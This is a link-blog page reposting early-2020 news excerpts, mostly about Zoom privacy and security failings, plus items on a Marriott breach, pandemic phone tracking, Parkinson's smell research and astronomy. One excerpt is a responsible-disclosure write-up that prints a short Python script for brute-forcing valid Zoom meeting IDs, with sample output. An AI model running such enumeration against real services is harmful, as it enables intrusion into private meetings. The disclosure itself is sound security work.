The Linkielist

Linking ideas with the world

The Linkielist

Ubisoft offers free games to encourage you to stay at home

Posted on by

Ubisoft thinks it has a simple way to encourage people to stay at home and wait out the COVID-19 pandemic: shower them with games. It’s running a month-long campaign that will give away free games, trials, discounts and other offers to give you something to do while you’re cooped up. It’s starting things off by offering the PC version of Rayman Legends for free on Uplay from now through April 3rd. It’s an old title, to be sure, but it might hit the spot if you’re looking for an upbeat game to remind you that things will get better.

Future offers will be available through Ubisoft’s Free Events site.

There’s no doubt that Ubi is using this partly as a promotional tool for its catalog. You might try a game you skipped the first time around, or might feel compelled to subscribe to Uplay+ to see more. At the same time, it might be particularly useful in some households. Not everyone has a backlog of games to burn through until lockdowns come to an end, let alone the money to buy more.

Source: Ubisoft offers free games to encourage you to stay at home | Engadget

Marriott Hotels hacked AGAIN: Two compromised employee logins abused to siphon off guests’ personal info

Posted on by

Marriott Hotels has suffered its second data spillage in as many years after an “unexpected amount” of guests’ data was accessed through two compromised employee logins, the under-fire chain has confirmed.

The size of the latest data exposure has not been disclosed, though Marriott admitted it seemed to have started in January 2020 and was detected “at the end of February.”

“We identified that an unexpected amount of guest information may have been accessed using the login credentials of two employees at a franchise property,” said Marriott, without identifying which of its 6,900 hotels worldwide was at the epicenter of the intrusion.

“Upon discovery, we confirmed that the login credentials were disabled, immediately began an investigation, implemented heightened monitoring, and arranged resources to inform and assist guests,” it continued.

Marriott did not explain why it took four weeks to begin alerting customers about the digital break-in.

Stolen data included name, postal and email addresses, phone numbers, Bonvoy loyalty card balance, gender, date of birth, linked loyalty scheme information from other companies and room/personal preferences.

The hotel chain asserted that credit card data, PINs, passport and driver’s licence information was not accessed by the hackers, whose identities are so far unknown.

Source: Marriott Hotels hacked AGAIN: Two compromised employee logins abused to siphon off guests’ personal info • The Register

Zoom is Leaking Peoples’ Email Addresses and Photos to Strangers

Posted on by

Popular video-conferencing Zoom is leaking personal information of at least thousands of users, including their email address and photo, and giving strangers the ability to attempt to start a video call with them through Zoom.

The issue lies in Zoom’s “Company Directory” setting, which automatically adds other people to a user’s lists of contacts if they signed up with an email address that shares the same domain. This can make it easier to find a specific colleague to call when the domain belongs to an individual company. But multiple Zoom users say they signed up with personal email addresses, and Zoom pooled them together with thousands of other people as if they all worked for the same company, exposing their personal information to one another.

“I was shocked by this! I subscribed (with an alias, fortunately) and I saw 995 people unknown to me with their names, images and mail addresses.” Barend Gehrels, a Zoom user impacted by the issue and who flagged it to Motherboard, wrote in an email.

Gehrels provided a redacted screenshot of him logged into Zoom with the nearly 1000 different accounts listed in the “Company Directory” section. He said these were “all people I don’t know of course.” He said his partner had the same issue with another email provider, and had over 300 people listed in her own contacts.

“If you subscribe to Zoom with a non-standard provider (I mean, not Gmail or Hotmail or Yahoo etc), then you get insight to ALL subscribed users of that provider: their full names, their mail addresses, their profile picture (if they have any) and their status. And you can video call them,” Gehrels said. A user still has to accept the call from the stranger for it to start, however.

1585667035243-zoom_blurred
A redacted screenshot of the Company Directory issue provided by Gehrels. Image: Motherboard

On its website, Zoom says, “By default, your Zoom contacts directory contains internal users in the same organization, who are either on the same account or who’s email address uses the same domain as yours (except for publicly used domains including gmail.com, yahoo.com, hotmail.com, etc) in the Company Directory section.”

Zoom’s system does not exempt all domains that are used for personal email, however. Gehrels said he encountered the issue with the domains xs4all.nl, dds.nl, and quicknet.nl. These are all Dutch internet service providers (ISPs) which offer email services.

On Twitter Motherboard found other instances of Dutch users reporting the same issue.

“I just had a look at the free for private use version of Zoom and registered with my private email. I now got 1000 names, email addresses and even pictures of people in the company Directory. Is this intentional?,” one user tweeted last week along with a screenshot.

Dutch ISP XS4ALL tweeted in response to a complaint on Sunday, “This is something we cannot disable. You could see if Zoom can help you with this.”

Do you know anything about data selling or trading? We’d love to hear from you. Using a non-work phone or computer, you can contact Joseph Cox securely on Signal on +44 20 8133 5190, Wickr on josephcox, OTR chat on jfcox@jabber.ccc.de, or email joseph.cox@vice.com.

Dutch ISP DDS told Motherboard in an email it was aware of the issue, but hadn’t heard directly from any of their own customers about it.

“Zoom maintains a blacklist of domains and regularly proactively identifies domains to be added,” a Zoom spokesperson told Motherboard. “With regards to the specific domains that you highlighted in your note, those are now blacklisted.” They also pointed to a section of the Zoom website where users can request other domains to be removed from the Company Directory feature.

Source: Zoom is Leaking Peoples’ Email Addresses and Photos to Strangers – VICE

Zoom: how you were able to join random meetings due to incredibly poor security design

Posted on by

In this publication we describe a technique which would have allowed a threat actor to potentially identify and join active meetings.

All the details discussed in this publication were responsibly disclosed to Zoom Video Communications, Inc. In response, Zoom introduced a number of mitigations, so this attack is no longer possible.

The Problem

If you use Zoom, you may already know that Zoom Meeting IDs are composed of 9, 10 or 11 digits. The problem was that if you hadn’t enabled the “Require meeting password” option or enabled Waiting Room, which allows manual participants admission, these 9-10-11 digits were the only thing that secured your meeting i.e. prevented an unauthorized person from connecting to it.


Let Me Guess…
The first thing we did was pre-generate the list of potentially valid Zoom Meeting IDs. We took 1000 “random” Meeting IDs and prepared the URL string for joining the meeting here as well:

urls = []
for _ in range(1000):
urls.append("https://zoom.us/j/{}".format(randint(100000000, 9999999999)))

But how could we determine if a Zoom Meeting ID represented a valid meeting or not? We discovered a fast and easy way to check this based on the following “div” element present in the HTML Body of the returned response, when accessing “Join Meeting” URL (https://zoom.us/j/{MEETING_ID})

<div id="join-errormsg" class="error"><i></i><span>Invalid meeting ID.</span></div&gt

I Found It!
We then tried to automate the described approach (just in case you don’t want to brute force all the Meeting IDs by hand):

for url in urls:
    yield MakeHTTPRequest(url=url, callback=parseResponse)

def MakeHTTPRequest(url, callback)
    

def parseResponse(response):
    if response.css('div#join-errormsg').get() is None:
        print('Valid Meeting ID found: {}'.format(response.url))
    else:
        print('Invalid Meeting ID')

…and look at the output:

Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/22XXX41X8
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/8XXX34XXX9
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/93XXX9XXX5
Invalid Meeting ID
Invalid Meeting ID

Bingo!

Results
We were able to predict ~4% of randomly generated Meeting IDs, which is a very high chance of success, comparing to the pure brute force.

Mitigation

We contacted Zoom on July 22, 2019 as part of a responsible disclosure process and proposed the following mitigations:
1. Re-implement the generation algorithm of Meeting IDs
2. Replace the randomization function with a cryptographically strong one.
3.Increase the number of digits\symbols in the Meeting IDs.
4.Force hosts to use passwords\PINs\SSO for authorization purposes.

Zoom representatives were very collaborative and responded quickly to our emails. Here is the list of changes that were introduced to the Zoom client\infrastructure following our disclosure:

  1. Passwords are added by default to all future scheduled meetings.
  2. Users can able to add a password to already-scheduled future meetings and received instructions by email on how to do so. See article for instructions: https://support.zoom.us/hc/en-us/articles/360033331271-Account-Setting-Update-Password-Default-for-Meeting-and-Webinar
  3. Password settings are enforceable at the account level and group level by the account admin.
  4. Zoom will no longer automatically indicate if a meeting ID is valid or invalid. For each attempt, the page will load and attempt to join the meeting. Thus, a bad actor will not be able to quickly narrow the pool of meetings to attempt to join.
  5. Repeated attempts to scan for meeting IDs will cause a device to be blocked for a period of time.

Source: Zoom-Zoom: We Are Watching You – Check Point Research

FBI Issues Warning, NY Attorney General Makes Inquiry After Wave of Zoom Hijackings

Posted on by

The FBI has issued a warning about video messaging service Zoom, and New York Attorney General’s office has made an inquiry into its cybersecurity practices, after a string of disturbing incidents involving takeovers of teleconferences.

Per Agence France-Presse, malicious individuals have been taking advantage of lax security and the surge in teleconferencing during the coronavirus pandemic to pull off a trick called “Zoombombing,” in which they can join any public meeting and use the app’s screen-sharing mode to broadcast whatever they want. All Zoom meetings are public by default, and as the Verge noted, the settings to restrict screen sharing to the host of a meeting (or turn it off after a meeting starts) are hidden under menus. This means that anyone who forgets to tweak these settings, which appears to be an awful lot of people, is vulnerable to Zoombombing.

Trolls have eagerly taken the opportunity to hijack Zoom meetings and broadcast pornography, slurs, and Nazi imagery to everything from religious institutions and corporate meetings to classrooms at schools. In one incident, someone took over a Chipotle meeting on Zoom featuring musician Lauv and promptly flooded it with hardcore porn. Zoom, which has experienced an explosion in downloads during the ongoing period of social distancing, has seemed caught off guard.

On Monday, the FBI’s Boston office issued a warning that it “has received multiple reports of conferences being disrupted by pornographic and/or hate images and threatening language. As individuals continue the transition to online lessons and meetings, the FBI recommends exercising due diligence and caution in your cybersecurity efforts.” In the warning, it noted one Massachusetts incident in which an individual joined an online high school classroom hosted on Zoom to yell profanities and reveal the teacher’s home address. Another school reported an incident to the FBI in which a man with “swastika tattoos” joined a meeting; the FBI told anyone who has had a Zoom call hijacked to contact its Internet Crime Complaint Center.

A spokesperson for the NY Attorney General’s office told AFP that they had sent a letter to Zoom “with a number of questions to ensure the company is taking appropriate steps to ensure users’ privacy and security.” The spokesperson added that they were “trying to work with the company” to prevent future incidents.

This isn’t the first time Zoom has come under scrutiny. On Tuesday, a report in the Intercept found that the service guarantees of end-to-end encryption for video meetings without a mobile device, but it actually uses transport encryption, allowing Zoom developers to access unencrypted audio and video content of meetings. (The Intercept noted that unlike Google, Facebook, and Microsoft, Zoom does not publish transparency reports on how many law enforcement requests for data it receives or how many it complies with.)

Zoom also recently pushed an update to nix code that sent analytics data to Facebook’s Graph API (even when Zoom users didn’t have an account on the social network) under a privacy policy that didn’t make the extent of the sharing clear. That is current the subject of a class action lawsuit, though whether or not the suit is viable is another question. Zoom also eventually caved last year and patched a “click-to-join” feature that installed insecure local web servers on Mac machines that weren’t deleted when the app was removed, allowing remote access to the webcams of any Mac that had current or previous installations of Zoom. The company had initially defended it as a convenience feature.

“We work 24 hours a day to ensure that hospitals, universities, schools and other companies can be connected and operational,” a Zoom spokesperson told AFP. “We appreciate the interest of the New York prosecutor in these matters and are happy to deliver the requested information.”

Source: FBI Issues Warning, NY Attorney General Makes Inquiry After Wave of Zoom Hijackings

Zoom Meetings Aren’t End-to-End Encrypted, Despite Misleading Marketing. Also, they mine your data with vampire teeth.

Posted on by

Zoom, the video conferencing service whose use has spiked amid the Covid-19 pandemic, claims to implement end-to-end encryption, widely understood as the most private form of internet communication, protecting conversations from all outside parties. In fact, Zoom is using its own definition of the term, one that lets Zoom itself access unencrypted video and audio from meetings.

With millions of people around the world working from home in order to slow the spread of the coronavirus, business is booming for Zoom, bringing more attention on the company and its privacy practices, including a policy, later updated, that seemed to give the company permission to mine messages and files shared during meetings for the purpose of ad targeting.

Still, Zoom offers reliability, ease of use, and at least one very important security assurance: As long as you make sure everyone in a Zoom meeting connects using “computer audio” instead of calling in on a phone, the meeting is secured with end-to-end encryption, at least according to Zoom’s website, its security white paper, and the user interface within the app. But despite this misleading marketing, the service actually does not support end-to-end encryption for video and audio content, at least as the term is commonly understood. Instead it offers what is usually called transport encryption, explained further below.

zoom-ui

When mousing over the green lock in the top left of the Zoom desktop app, it says, “Zoom is using an end to end encrypted connection”

Screenshot: The Intercept

In Zoom’s white paper, there is a list of “pre-meeting security capabilities” that are available to the meeting host that starts with “Enable an end-to-end (E2E) encrypted meeting.” Later in the white paper, it lists “Secure a meeting with E2E encryption” as an “in-meeting security capability” that’s available to meeting hosts. When a host starts a meeting with the “Require Encryption for 3rd Party Endpoints” setting enabled, participants see a green padlock that says, “Zoom is using an end to end encrypted connection” when they mouse over it.

But when reached for comment about whether video meetings are actually end-to-end encrypted, a Zoom spokesperson wrote, “Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection.”

The encryption that Zoom uses to protect meetings is TLS, the same technology that web servers use to secure HTTPS websites. This means that the connection between the Zoom app running on a user’s computer or phone and Zoom’s server is encrypted in the same way the connection between your web browser and this article (on https://theintercept.com) is encrypted. This is known as transport encryption, which is different from end-to-end encryption because the Zoom service itself can access the unencrypted video and audio content of Zoom meetings. So when you have a Zoom meeting, the video and audio content will stay private from anyone spying on your Wi-Fi, but it won’t stay private from the company. (In a statement, Zoom said it does not directly access, mine, or sell user data; more below.)

Source: Zoom Meetings Do Not Support End-to-End Encryption

Oh dear.

 

 

Hacker hijacks all Microsoft and CCC YouTube accounts to broadcast crypto Ponzi scam

Posted on by

A hacker has hijacked all of Microsoft’s official YouTube accounts and is broadcasting a cryptocurrency Ponzi scam to the company’s subscribers, ZDNet has learned from one of our readers.

The hacks appear to have occurred about 13 hours ago, according to our source. The hijacked accounts are still streaming at the time of writing, despite being reported to YouTube’s moderators for more than one hour.

The hacker is currently live-streaming an old Bill Gates talk on startups that the former Microsoft CEO gave to an audience at Village Global in June 2019.

Hackers are live-streaming an altered version of the presentation, but also asking for viewers to participate in a classic “crypto giveaway” — where victims are tricked to send a small sum of cryptocurrency to double their earnings but never get any funds in return.

[…]

The Bitcoin address listed in the video streams did not receive any transactions or holds any funds, suggesting that no users have fallen for the scam. Based on YouTube stream stats, tens of thousands have seen the video feeds.

Microsoft was not the only organization impacted by the mass hijack and defacement incident. The Chaos Computer Club, a famous Germany-based hacking community, has also had its account hijacked to broadcast a similar message.

Source: Hacker hijacks Microsoft YouTube accounts to broadcast crypto Ponzi scam | ZDNet

Someone Convinced Google To Delist Our Entire Right To Be Forgotten Tag In The EU For Searches On Their Name, which means we can’t tell if they are abusing the system

Posted on by

The very fact that the tag being delisted when searching for this unnamed individual is the “right to be forgotten” tag shows that whoever this person is, they recognize that they are not trying to cover up the record of, say, an FTC case against them from… oh, let’s just say 2003… but rather are now trying to cover up their current effort to abuse the right to be forgotten process.

Anyway, in theory (purely in theory, of course) if someone in the EU searched for the name of anyone, it might be helpful to know if the Director of the FTC’s Bureau of Consumer Protection once called him a “spam scammer” who “conned consumers in two ways.” But, apparently, in the EU, that sort of information is no longer useful. And you also can’t find out that he’s been using the right to be forgotten process to further cover his tracks. That seems unfortunate, and entirely against the supposed principle behind the “right to be forgotten.” No one is trying to violate anyone’s “privacy” here. We’re talking about public court records, and an FTC complaint and later settlement on a fairly serious crime that took place not all that long ago. That ain’t private information. And, even more to the point, the much more recent efforts by that individual to then hide all the details of this public record.

Source: Someone Convinced Google To Delist Our Entire Right To Be Forgotten Tag In The EU For Searches On Their Name | Techdirt

A Woman Who Can Smell Parkinson’s, Alzheimers, Cancer, TBC, Is Inspiring New Research Into Diagnosis

Posted on by

For most of her life, Joy Milne had a superpower that she was totally oblivious to. She simply had no idea she possessed an utterly amazing, slightly terrifying biological gift that scientists would itch to study.

In fact, Joy probably would have stayed oblivious if it hadn’t been for her husband, Les Milne.

[…]

But then one day, about 10 years into the marriage, when Les was 31, he came home, and strangely, Joy says, he smelled different. “His lovely male musk smell had got this overpowering sort of nasty yeast smell,” she says.

[…]

Joy says that over the next 20 years she and Les tried to make the best of things, but it was difficult: the loss of movement, the loss of work, the slow narrowing of their world. Still, they struggled through. Then about seven years ago, they decided to attend a support group for people suffering from Parkinson’s.

“We were late. … A lot of people were there. And I walked into the room and I thought, ‘SMELL!’ ” she says.

Joy realized that the other people in the room had the same greasy, musty smell that Les had — the smell that Joy had first noticed when Les was just 31. “And then I realized for some people it smelled stronger and for other people it didn’t smell so strong,” she says.

Could it be, Joy wondered, that Parkinson’s has a smell?

As they drove home from the meeting, Joy kept puzzling it over in her head, and by the time they arrived, she’d decided she would tell her husband.

She says once she made her discovery clear, his eyes widened: “He’s a doctor — we both understood the significance. Immediately.”

To begin, this was a new scientific discovery, but also, Joy had smelled the disease on Les more than a decade before his symptoms got severe enough for them to seek medical help. If Joy could predict Parkinson’s before its well-known symptoms, such as shaking and sleep disruption, even started to appear, maybe she could work with researchers. It might lead to a breakthrough.

[…]

Kunath asked one group of people who had Parkinson’s and another group of people who didn’t have Parkinson’s to take home white T-shirts, wear them overnight and then return them.

Then Kunath gave the T-shirts to Joy to smell. “They were all given randomized numbers and put in a box, and then she was asked to take each one out and give it a score,” he says.

Was the person who wore this shirt at an early stage of Parkinson’s? In a late stage of Parkinson’s? Something in between? Or maybe the person didn’t have the disease at all.

“And she was incredibly accurate,” Kunath says.

In fact, out of all the samples, Joy made only one mistake. She identified a man in the control group, the group without Parkinson’s, as having the disease. But many months later, Kunath says, that man actually approached him at an event and said, “Tilo, you’re going to have to put me in the Parkinson’s pile because I’ve just been diagnosed.”

It was incontrovertible: Joy not only could smell Parkinson’s but could smell it even in the absence of its typical medical presentation.

Kunath and fellow scientists published their work in ACS Central Science in March 2019, listing Joy as a co-author. Their research identified certain specific compounds that may contribute to the smell that Joy noticed on her husband and other Parkinson’s patients.

[…]

Joy and her super smelling abilities have opened up a whole new realm of research, Kunath says. Researchers, including Perdita Barran at the University of Manchester, led a second, larger study and have recently found 10 compounds linked to Parkinson’s by using mass spectrometry and other techniques to analyze samples from 274 people. They’re hoping to find a way to diagnose Parkinson’s from skin-based biomarkers, according to Barran. More work is soon to come, she adds.

[…]

Joy’s superpower is so unusual that researchers all over the world have started working with her and have discovered that she can identify several kinds of illnesses — tuberculosis, Alzheimer’s disease, cancer and diabetes.

Source: A Woman Who Can Smell Parkinson’s Is Inspiring New Research Into Diagnosis : Shots – Health News : NPR

US Officials Use Mobile Ad Location Data to Study How COVID-19 Spreads, not cellphone tower data

Posted on by

Government officials across the U.S. are using location data from millions of cellphones in a bid to better understand the movements of Americans during the coronavirus pandemic and how they may be affecting the spread of the disease…

The data comes from the mobile advertising industry rather than cellphone carriers. The aim is to create a portal for federal, state and local officials that contains geolocation data in what could be as many as 500 cities across the U.S., one of the people said, to help plan the epidemic response… It shows which retail establishments, parks and other public spaces are still drawing crowds that could risk accelerating the transmission of the virus, according to people familiar with the matter… The data can also reveal general levels of compliance with stay-at-home or shelter-in-place orders, according to experts inside and outside government, and help measure the pandemic’s economic impact by revealing the drop-off in retail customers at stores, decreases in automobile miles driven and other economic metrics.

The CDC has started to get analyses based on location data through through an ad hoc coalition of tech companies and data providers — all working in conjunction with the White House and others in government, people said.

The CDC and the White House didn’t respond to requests for comment.
It’s the cellphone carriers turning over pandemic-fighting data in Germany, Austria, Spain, Belgium, the U.K., according to the article, while Israel mapped infections using its intelligence agencies’ antiterrorism phone-tracking. But so far in the U.S., “the data being used has largely been drawn from the advertising industry.

“The mobile marketing industry has billions of geographic data points on hundreds of millions of U.S. cell mobile devices…”

Source: US Officials Use Mobile Ad Location Data to Study How COVID-19 Spreads – Slashdot

I am unsure if this says more about the legality of the move or the technical decentralisation of cell phone tower data making it technically difficult to track the whole population

Israel uses anti-terrorist tech to monitor phones of virus patients

Posted on by

Israel has long been known for its use of technology to track the movements of Palestinian militants. Now, Prime Minister Benjamin Netanyahu wants to use similar technology to stop the movement of the coronavirus.

Netanyahu’s Cabinet on Sunday authorized the Shin Bet security agency to use its phone-snooping tactics on coronavirus patients, an official confirmed, despite concerns from civil-liberties advocates that the practice would raise serious privacy issues. The official spoke on condition of anonymity pending an official announcement.

Netanyahu announced his plan in a televised address late Saturday, telling the nation that the drastic steps would protect the public’s health, though it would also “entail a certain degree of violation of privacy.”

Israel has identified more than 200 cases of the coronavirus. Based on interviews with these patients about their movements, health officials have put out public advisories ordering tens of thousands of people who may have come into contact with them into protective home quarantine.

The new plan would use mobile-phone tracking technology to give a far more precise history of an infected person’s movements before they were diagnosed and identify people who might have been exposed.

In his address, Netanyahu acknowledged the technology had never been used on civilians. But he said the unprecedented health threat posed by the virus justified its use. For most people, the coronavirus causes only mild or moderate symptoms. But for some, especially older adults and people with existing health problems, it can cause more severe illness.

“They are not minor measures. They entail a certain degree of violation of the privacy of those same people, who we will check to see whom they came into contact with while sick and what preceded that. This is an effective tool for locating the virus,” Netanyahu said.

The proposal sparked a heated debate over the use of sensitive security technology, who would have access to the information and what exactly would be done with it.

Nitzan Horowitz, leader of the liberal opposition party Meretz, said that tracking citizens “using databases and sophisticated technological means are liable to result in a severe violation of privacy and basic civil liberties.” He said any use of the technology must be supervised, with “clear rules” for the use of the information.

Netanyahu led a series of discussions Sunday with security and health officials to discuss the matter. Responding to privacy concerns, he said late Sunday he had ordered a number of changes in the plan, including reducing the scope of data that would be gathered and limiting the number of people who could see the information, to protect against misuse.

Source: Israel takes step toward monitoring phones of virus patients – ABC News

What I’m missing is a maximum duration for these powers to be used.

Astronomers have found the edge of the Milky Way at last

Posted on by

Our galaxy is a whole lot bigger than it looks. New work finds that the Milky Way stretches nearly 2 million light-years across, more than 15 times wider than its luminous spiral disk. The number could lead to a better estimate of how massive the galaxy is and how many other galaxies orbit it.

Astronomers have long known that the brightest part of the Milky Way, the pancake-shaped disk of stars that houses the sun, is some 120,000 light-years across (SN: 8/1/19). Beyond this stellar disk is a disk of gas. A vast halo of dark matter, presumably full of invisible particles, engulfs both disks and stretches far beyond them (SN: 10/25/16). But because the dark halo emits no light, its diameter is hard to measure.

Now, Alis Deason, an astrophysicist at Durham University in England, and her colleagues have used nearby galaxies to locate the Milky Way’s edge. The precise diameter is 1.9 million light-years, give or take 0.4 million light-years, the team reports February 21 in a paper posted at arXiv.org.

To put that size into perspective, imagine a map in which the distance between the sun and the Earth is just one inch. If the Milky Way’s heart were at the center of the Earth, the galaxy’s edge would be four times farther away than the moon actually is.

To find the Milky Way’s edge, Deason’s team conducted computer simulations of how giant galaxies like the Milky Way form. In particular, the scientists sought cases where two giant galaxies arose side by side, like the Milky Way and Andromeda, our nearest giant neighbor, because each galaxy’s gravity tugs on the other (SN: 5/12/15). The simulations showed that just beyond the edge of a giant galaxy’s dark halo, the velocities of small nearby galaxies drop sharply (SN: 3/11/15).

Using existing telescope observations, Deason and her colleagues found a similar plunge in the speeds of small galaxies near the Milky Way. This occurred at a distance of about 950,000 light-years from the Milky Way’s center, marking the galaxy’s edge, the scientists say. The edge is 35 times farther from the galactic center than the sun is.

Although dark matter makes up most of the Milky Way’s mass, the simulations reveal that stars should also exist at these far-out distances. “Both have a well-defined edge,” Deason says. “The edge of the stars is very sharp, almost like the stars just stop at a particular radius.”

Source: Astronomers have found the edge of the Milky Way at last | Science News

Zoom Removes Code That Sends Data to Facebook – but there is still plenty of nasty stuff in there

Posted on by

On Friday video-conferencing software Zoom issued an update to its iOS app which stops it sending certain pieces of data to Facebook. The move comes after a Motherboard analysis of the app found it sent information such as when a user opened the app, their timezone, city, and device details to the social network giant.

When Motherboard analyzed the app, Zoom’s privacy policy did not make the data transfer to Facebook clear.

“Zoom takes its users’ privacy extremely seriously. We originally implemented the ‘Login with Facebook’ feature using the Facebook SDK in order to provide our users with another convenient way to access our platform. However, we were recently made aware that the Facebook SDK was collecting unnecessary device data,” Zoom told Motherboard in a statement on Friday.

Source: Zoom Removes Code That Sends Data to Facebook – VICE

But there is still pleny of data being hoovered up by Zoom:
Yeah, that Zoom app you’re trusting with work chatter? It lives with ‘vampires feeding on the blood of human data’

Yeah, that Zoom app you’re trusting with work chatter? It lives with ‘vampires feeding on the blood of human data’

Posted on by

As the global coronavirus pandemic pushes the popularity of videoconferencing app Zoom to new heights, one web veteran has sounded the alarm over its “creepily chummy” relationship with tracking-based advertisers.

Doc Searls, co-author of the influential internet marketing book The Cluetrain Manifesto last century, today warned [cached] Zoom not only has the right to extract data from its users and their meetings, it can work with Google and other ad networks to turn this personal information into targeted ads that follow them across the web.

This personal info includes, and is not limited to, names, addresses and any other identifying data, job titles and employers, Facebook profiles, and device specifications. Crucially, it also includes “the content contained in cloud recordings, and instant messages, files, whiteboards … shared while using the service.”

Searls said reports outlining how Zoom was collecting and sharing user data with advertisers, marketers, and other companies, prompted him to pore over the software maker’s privacy policy to see how it processes calls, messages, and transcripts.

And he concluded: “Zoom is in the advertising business, and in the worst end of it: the one that lives off harvested personal data.

“What makes this extra creepy is that Zoom is in a position to gather plenty of personal data, some of it very intimate (for example with a shrink talking to a patient) without anyone in the conversation knowing about it. (Unless, of course, they see an ad somewhere that looks like it was informed by a private conversation on Zoom.)”

The privacy policy, as of March 18, lumps together a lot of different types of personal information, from contact details to meeting contents, and says this info may be used, one way or another, to personalize web ads to suit your interests.

“Zoom does use certain standard advertising tools which require personal data,” the fine-print states. “We use these tools to help us improve your advertising experience (such as serving advertisements on our behalf across the internet, serving personalized ads on our website, and providing analytics services) … For example, Google may use this data to improve its advertising services for all companies who use their services.”

Searls, a former Harvard Berkman Fellow, said netizens are likely unaware their information could be harvested from their Zoom accounts and video conferences for advertising and tracking across the internet: “A person whose personal data is being shed on Zoom doesn’t know that’s happening because Zoom doesn’t tell them. There’s no red light, like the one you see when a session is being recorded.

“Nobody goes to Zoom for an ‘advertising experience,’ personalized or not. And nobody wants ads aimed at their eyeballs elsewhere on the ‘net by third parties using personal information leaked out through Zoom.”

Speaking of Zoom…

Zoom’s iOS app sent analytics data to Facebook even if you didn’t use Facebook, due to the application’s use of the social network’s Graph API, Vice discovered. The privacy policy stated the software collects profile information when a Facebook account is used to sign into Zoom, though it didn’t say anything about what happens if you don’t use Facebook. Zoom has since corrected its code to not send analytics in these circumstances.

It should go without saying but don’t share your Zoom meeting ID and password in public, such as on social media, as miscreants will spot it, hijack it, and bomb it with garbage. And don’t forget to set a strong password, too. Zoom had to beef up its meeting security after Check Point found a bunch of weaknesses, such as the fact it was easy to guess or brute-force meeting IDs.

Source: Yeah, that Zoom app you’re trusting with work chatter? It lives with ‘vampires feeding on the blood of human data’ • The Register

Android Apps Are Transmitting what other apps you have ever installed to marketing peole

Posted on by

At this point we’re all familiar with apps of all sorts tracking our every move and sharing that info with pretty much every third party imaginable. But it actually may not be as simple as tracking where you go and what you do in an app: It turns out that these apps might be dropping details about the other programs you’ve installed on your phone, too.

This news comes courtesy of a new paper out from a team of European researchers who found that some of the most popular apps in the Google Play store were bundled with certain bits of software that pull details of any apps that were ever downloaded onto a person’s phone.

Before you immediately chuck your Android device out the window in some combination of fear and disgust, we need to clarify a few things. First, these bits of software—called IAMs, or “installed application methods”—have some decent uses. A photography app might need to check the surrounding environment to make sure you have a camera installed somewhere on your phone. If another app immediately glitches out in the presence of an on-phone camera, knowing the environment—and the reason for that glitch—can help a developer know which part of his app to tinker with to keep that from happening in the future.

Because these IAM-specific calls are technically for debugging purposes, they generally don’t need to secure permissions the same way an app usually would when, say, asking for your location. Android devices have actually gotten better about clamping down on that form of invasive tracking after struggling with it for years, recently announcing that the Android 11 formally requiring that devs apply for location permissions access before Google grants it.

But at the same time, surveying the apps on a given phone can go the invasive route very easily: The apps we download can tip developers off about our incomes, our sexualities, and some of our deepest fears.

The research team found that, of the roughly 4,200 commercial apps it surveyed making these IAM calls, almost half were strictly grabbing details on the surrounding apps. For context, most other calls—which were for monitoring details about the app like available updates, or the current app version—together made up less than one percent of all calls they observed.

There are a few reasons for the prevalence of this errant app-sniffing behavior, but for the most part it boils down to one thing: money. A lot of these IAMs come from apps that are on-boarding software from adtech companies offering developers an easy way to make quick cash off their free product. That’s probably why the lion’s share—more than 83%—of these calls were being made on behalf of third-party code that the dev onboarded for their commercially available app, rather than code that was baked into that app by design.

And for the most part, these third parties are—as you might have suspected—companies that specialize in targeted advertising. Looking over the top 20 libraries that pull some kind of data via IAMs, some of the top contenders, like ironSource or AppNext, are in the business of getting the right ads in front of the right player at the right time, offering the developer the right price for their effort.

And because app developers—like most people in the publishing space—are often hard-up for cash, they’ll onboard these money-making tools without asking how they make that money in the first place. This kind of daisy-chaining is the same reason we see trackers of every shape and size running across every site in the modern ecosystem, at times without the people actually behind the site having any idea.

Source: Android Apps May Be Snooping on You More Than You Realize

cheap High-frequency, high-power and nanoscale semiconductors that can see through walls

Posted on by

Scientists have crafted a tiny flexible electrical device capable of generating terahertz waves that can penetrate walls and microscopic cells, potentially paving the way for new imaging techniques – and fast switching in chips.

Terahertz radiation lies in the electromagnetic spectrum where microwaves and infrared meet. These so-called T-waves, ranging from 0.3 to 3THz according to the ITU, have interesting properties: they can travel through clothing, wood, walls, and even human skin, for one thing.

However, they can be tricky to produce, depending on the application, as you often need expensive and clunky equipment. Now, a team of researchers led by the École polytechnique fédérale de Lausanne (EPFL) in Switzerland believe they’ve created something that not only emits high-power terahertz radiation but is both compact and cheap. Which is useful for miniaturization and productization.

The gizmo detailed in a paper published in Nature this week works by producing so-called nanoplasma.

Here’s how it works: two tiny metal plates are placed 20 nanometres apart and a voltage is applied. Electrons migrate towards one of the plates to create a nanoplasma. When enough negative charge has accumulated and the voltage across the plates reaches a critical threshold, the electrons instantly flock to the other plate.

“The very high electric field in the small volume of the nanoplasma leads to ultrafast electron transfer, resulting in extremely short time responses,” the paper explained. This back and forth motion of the electrons on each plate continues, and the device emits a high-intensity pulse of terahertz waves.

“We achieved an ultrafast switching speed, higher than 10 volts per picosecond (10-12 s), which is about two orders of magnitude larger than that of field-effect transistors and more than ten times faster than that of conventional electronic switches,” the academics said.

The tiny nanoplasma devices were fabricated on bits of Kapton tape pasted onto a sapphire substrate, where a thin layer of gold or tungsten was stacked on top of titanium.

“High-frequency semiconductor devices are nanoscale in size,” said Elison Matioli, co-author of the study and an electrical engineering professor at EPFL.

“They can only cope with a few volts before breaking out. High-power devices, meanwhile, are too big and slow to generate terahertz waves. Our solution was to revisit the old field of plasma with state-of-the-art nanoscale fabrication techniques to propose a new device to get around those constraints.”

“High-frequency, high-power and nanoscale aren’t terms you’d normally hear in the same sentence,” he added.

The fast switching speeds could help deliver ultrafast chips that could be used in wireless communication, sensors, or even biomedical imaging.

